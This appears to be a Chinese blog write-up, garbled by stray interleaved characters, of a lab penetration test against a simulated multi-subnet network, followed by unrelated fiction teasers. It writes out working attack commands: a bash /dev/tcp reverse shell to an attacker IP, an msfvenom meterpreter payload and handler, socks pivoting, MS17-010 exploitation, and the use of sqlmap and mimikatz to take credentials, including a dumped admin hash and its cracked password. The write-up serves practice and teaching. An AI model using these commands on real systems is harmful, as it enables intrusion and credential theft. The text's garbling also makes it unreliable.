記一次模擬環(huán)境的滲透記錄

????平時(shí)不怎么習(xí)慣做記錄绪杏,導(dǎo)致很多時(shí)候在實(shí)際滲透中拌夏,遇到了某些問題的時(shí)候,還得去咨詢度娘栅迄,谷鍋,所以憋活,現(xiàn)在決定好好糾正一下這個(gè)問題悦即,同時(shí)也希望分享給愛好安全的同學(xué)們。

????這個(gè)滲透實(shí)驗(yàn)做了蠻久了作瞄,當(dāng)時(shí)做的時(shí)候呢,也就做了點(diǎn)簡單的記錄。emmmm宵喂,廢話也不多說了,開始進(jìn)入正題吧裸燎!

? ? 這是我畫的一個(gè)十分拙劣的拓?fù)鋱D!T棠伞6夹怼K笾伞颖低!

拓?fù)鋱D

????1.我們目前能訪問的就只有192.168.5.10這個(gè)網(wǎng)站,進(jìn)入網(wǎng)站后弧烤,經(jīng)過簡單的瀏覽頁面,可以發(fā)現(xiàn)蹬敲,存在文件包含暇昂,關(guān)于文件包含的利用方法有很多,這里我也就不做過多闡述了伴嗡。

????2.現(xiàn)在就來測試一下是否存在漏洞泣懊,在這里我使用的是PHP的偽協(xié)議警没,可以很直觀的看到嵌言,這里確實(shí)是存在漏洞的

????3.確定存在漏洞之后购裙,直接使用遠(yuǎn)程文件包含來獲取shell夯到,因?yàn)槭菍?shí)驗(yàn)環(huán)境,所以直接在本地開啟http服務(wù)杂伟,并在網(wǎng)站目錄下频蛔,創(chuàng)建一個(gè)一句話腳本舟肉,注意這個(gè)腳本后綴不能是被php所解析的后綴院领。

????4.使用菜刀進(jìn)行連接嚎研,地址就填遠(yuǎn)程文件包含的那個(gè)地址

????5.連接終端闰靴,查詢一些基本信息,原諒我連whoami都打錯(cuò)了一次风宁,233333苦始,可以看到是一個(gè)低權(quán)限用戶类缤,在查看內(nèi)核,使用對應(yīng)的exp進(jìn)行提權(quán)

????6.因?yàn)檫@個(gè)菜刀的終端用起來不太方便枯芬,所以我在做提權(quán)的時(shí)候,做了一次反彈shell胳搞,不過忘記截圖了,具體的命令是這樣的

目標(biāo)端:/bin/bash/ -i > /dev/tcp/192/168.5.107/7777 0<&1 2>&1

攻擊端:nc -lvnp 7777

? ? 7.在獲取反彈的shell之后称杨,就可以使用對應(yīng)的exp進(jìn)行提權(quán)了肌毅,不過需要注意的事,上傳exp之后姑原,需要查看是否有運(yùn)行權(quán)限悬而,如果沒有運(yùn)行權(quán)限的話,使用 chmod u+x 文件名 賦予其可執(zhí)行權(quán)限锭汛。

? ? 8.在提權(quán)成功之后笨奠,我直接創(chuàng)建一個(gè)用戶袭蝗,并添加到root組,登陸ssh

9.因?yàn)槭切枰鰞?nèi)網(wǎng)滲透般婆,那么不可或缺神器的就是MSF到腥,首先生成一個(gè)MSF的后門

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.5.107 LPORT=4444 -f elf >shell.elf

????開啟監(jiān)聽:

? ??use exploit/multi/handler

? ??set PAYLOAD linux/x86/meterpreter/reverse_tcp

? ??set LHOST 0.0.0.0

? ??exploit

? ? 10.已經(jīng)得到反彈回來的shell,那么現(xiàn)在應(yīng)該做的就是添加路由對其內(nèi)網(wǎng)進(jìn)行探測

添加路由

? ? 11.在對內(nèi)網(wǎng)探測的時(shí)候蔚袍,我偷了個(gè)懶乡范,直接上傳了nmap的源碼到邊界服務(wù)器,不過在實(shí)戰(zhàn)中可不能這么做啤咽。以下就是192.168.6.0/24網(wǎng)段中的機(jī)器晋辆,OK,現(xiàn)在來逐個(gè)擊破

? ? 12.可以看到宇整,16,17這個(gè)兩個(gè)IP開放了80端口瓶佳,但是其處于內(nèi)網(wǎng)之中,我們是無法訪問到的没陡,那么這個(gè)時(shí)候涩哟,就可以使用ew反手給它一套連招,讓它乖乖就范盼玄。

? ? 在邊界服務(wù)器贴彼,開啟socks代理?./ew -s ssocksd -l 1080

13.我使用的代理工具SocksCap,添加服務(wù)器:192.168.5.10埃儿,連接socks服務(wù)器仗,便可訪問其內(nèi)網(wǎng)了,這款工具我個(gè)人感覺挺好用的童番。大家有興趣的話精钮,可以試一試。

14.訪問192.168.6.16這個(gè)內(nèi)網(wǎng)的80端口后剃斧,發(fā)現(xiàn)沒有任何可以利用的地方轨香,但是我突然看到之前的掃描結(jié)果,發(fā)現(xiàn)開放了8080端口幼东,這個(gè)我相信大家都很熟悉吧臂容,一進(jìn)去,果然就是tomcat的主頁根蟹,通過弱口令脓杉,成功進(jìn)入到了配置頁面。直接進(jìn)去正題简逮,找到war包上傳地點(diǎn)球散,本地編譯war包,上傳散庶,拿到shell蕉堰。

????因?yàn)楹芏鄑omcat部署的時(shí)候凌净,都是高權(quán)限用戶部署的,所以其默認(rèn)繼承于root嘁灯,不需要進(jìn)行提權(quán)泻蚊。

????拿到flag,其實(shí)每個(gè)站點(diǎn)都有兩個(gè)flag丑婿,不過我很多都忘記截圖了性雄,手動滑稽- -!

15.開始滲透192.168.6.17這個(gè)站點(diǎn)羹奉,是一個(gè)內(nèi)部OA系統(tǒng)秒旋,嘗試爆破沒有成功,目錄掃描沒有可以用頁面诀拭,無奈之下迁筛,上了wvs漏掃,找到一個(gè)sql注入點(diǎn)耕挨。這個(gè)頁面掃描目錄的時(shí)候细卧,也掃出來過,但是沒上wvs的時(shí)候筒占,我怎么也沒想到這里會存在注入 = =

16.直接使用sqlmap進(jìn)行注入贪庙,這里需要使用代理,因?yàn)橹皊ocks斷了一次翰苫,所以我換了個(gè)端口

17.拿到管理員賬號止邮,隨手往MD5網(wǎng)站一丟,解密出來密碼為:37s984pass奏窑,同時(shí)還在數(shù)據(jù)庫中找到了另外一個(gè)flag

????Database: my_oa

????Table: admin

????[1 entry]

????+----+----------------------------------+----------+

????| id | password? ? ? ? ? ? ? ? ? ? ? ? | username |

????+----+----------------------------------+----------+

????| 1? | 29acd667cdbee1116d365727ca6821d3 | admin? ? |

????+----+----------------------------------+----------+

18.本來想嘗試直接用sqlmap寫shell的导披,但是發(fā)現(xiàn)沒有寫入的權(quán)限,所以就放棄了埃唯,拿到密碼撩匕,登陸OA管理系統(tǒng),找到文件上傳頁面墨叛,直接上傳php馬滑沧,沒有任何返回信息,然后我又上傳了一次正常的圖片巍实,發(fā)現(xiàn)其命名規(guī)則貌似是根據(jù)系統(tǒng)返回時(shí)間來進(jìn)行文件重命名的。

19.這個(gè)時(shí)候直接使用burp抓包上傳哩牍,這里還是需要注意棚潦,burp也是需要使用邊界服務(wù)器的socks代理的,不然也無法直接抓包上傳的膝昆。這里重新上傳一次大馬丸边,根據(jù)返回時(shí)間叠必,訪問大馬

20.在查看網(wǎng)卡的時(shí)候,發(fā)現(xiàn)沒有更深層次的主機(jī)的妹窖,那我也就不用提權(quán)了纬朝,翻閱目錄拿到flag走人

21.接下來就是192.168.6.200這個(gè)主機(jī)了,看到445端口骄呼,第一反應(yīng)就是ms17-010共苛,剛剛我們已經(jīng)做過路由了,那么直接執(zhí)行?

? ??use exploit windows/smb/ms17_010_psexec

? ??show PAYLOAD

? ? 找到下面箭頭所指的這個(gè)payload

? ?22.設(shè)置目標(biāo)機(jī)ip為192.168.6.200 蜓萄,設(shè)置反彈shell的ip與端口為我們控制的服務(wù)器

? 23.在執(zhí)行run之前隅茎,先在已經(jīng)控制的邊界服務(wù)器(192.168.6.10)上,用nc監(jiān)聽4555端口嫉沽,可以看到辟犀,已經(jīng)成功的將192.168.6.200的shell反彈回來

25.既然已經(jīng)拿到高權(quán)限shell了,先添加一個(gè)用戶再說

26.使用一些常用的域命令绸硕,收集一些信息

查看用戶所屬域
查詢域管理

27.使用新創(chuàng)建的用戶堂竟,登陸對方3389,因?yàn)槭怯颦h(huán)境玻佩,所以在連接3389的時(shí)候需要添加域的名稱

28.上傳mimikatz到192.168.5.10這個(gè)邊界服務(wù)器之后出嘹,再下載下來,并且夺蛇,雖然當(dāng)前賬號是在admin用戶組中疚漆,但是mimikatz必須要最高權(quán)限運(yùn)行。所以刁赦,在這里我也上傳了一個(gè)MS14-058的exp娶聘,用來執(zhí)行mimikatz

????可以看到mimikatz已經(jīng)成功執(zhí)行了

運(yùn)氣也比較好,抓到了域管理的密碼

29.在使用抓取到的域管理的密碼登陸當(dāng)前主機(jī)甚脉,拿到flag

30.查看一下網(wǎng)卡信息丸升,可以看到,還有內(nèi)網(wǎng)

31.查看網(wǎng)絡(luò)牺氨,嘗試連接win那臺主機(jī)狡耻,發(fā)現(xiàn)對方,為開啟3389猴凹,但是我們現(xiàn)在有域控密碼夷狰,直接使用IPC$進(jìn)行連接,在配合開啟3389的vbs腳本郊霎,直接打開對方3389沼头,但是我忘記截圖了,不過這里有個(gè)連接可以參考一下:https://wenku.baidu.com/view/f965f6ece009581b6bd9eb2c.html

32.登陸成功,拿到flag

至此這個(gè)實(shí)驗(yàn)就算基本完成了??ヽ(°▽°)ノ?进倍。本人技術(shù)不精土至,如有錯(cuò)誤的地方,歡迎指正猾昆。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末陶因,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子垂蜗,更是在濱河造成了極大的恐慌楷扬,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,743評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件么抗,死亡現(xiàn)場離奇詭異毅否,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)蝇刀,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,296評論 3 385
  • 文/潘曉璐 我一進(jìn)店門螟加,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人吞琐,你說我怎么就攤上這事捆探。” “怎么了站粟?”我有些...
    開封第一講書人閱讀 157,285評論 0 348
  • 文/不壞的土叔 我叫張陵黍图,是天一觀的道長。 經(jīng)常有香客問我奴烙,道長助被,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,485評論 1 283
  • 正文 為了忘掉前任切诀,我火速辦了婚禮揩环,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘幅虑。我一直安慰自己丰滑,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,581評論 6 386
  • 文/花漫 我一把揭開白布倒庵。 她就那樣靜靜地躺著褒墨,像睡著了一般。 火紅的嫁衣襯著肌膚如雪擎宝。 梳的紋絲不亂的頭發(fā)上郁妈,一...
    開封第一講書人閱讀 49,821評論 1 290
  • 那天,我揣著相機(jī)與錄音绍申,去河邊找鬼圃庭。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的剧腻。 我是一名探鬼主播,決...
    沈念sama閱讀 38,960評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼涂屁,長吁一口氣:“原來是場噩夢啊……” “哼书在!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起拆又,我...
    開封第一講書人閱讀 37,719評論 0 266
  • 序言:老撾萬榮一對情侶失蹤儒旬,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后帖族,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體栈源,經(jīng)...
    沈念sama閱讀 44,186評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,516評論 2 327
  • 正文 我和宋清朗相戀三年竖般,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了甚垦。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,650評論 1 340
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡涣雕,死狀恐怖艰亮,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情挣郭,我是刑警寧澤迄埃,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布,位于F島的核電站兑障,受9級特大地震影響侄非,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜流译,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,936評論 3 313
  • 文/蒙蒙 一逞怨、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧先蒋,春花似錦骇钦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,757評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至业岁,卻和暖如春鳞仙,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背笔时。 一陣腳步聲響...
    開封第一講書人閱讀 31,991評論 1 266
  • 我被黑心中介騙來泰國打工棍好, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,370評論 2 360
  • 正文 我出身青樓借笙,卻偏偏與公主長得像扒怖,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子业稼,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,527評論 2 349

推薦閱讀更多精彩內(nèi)容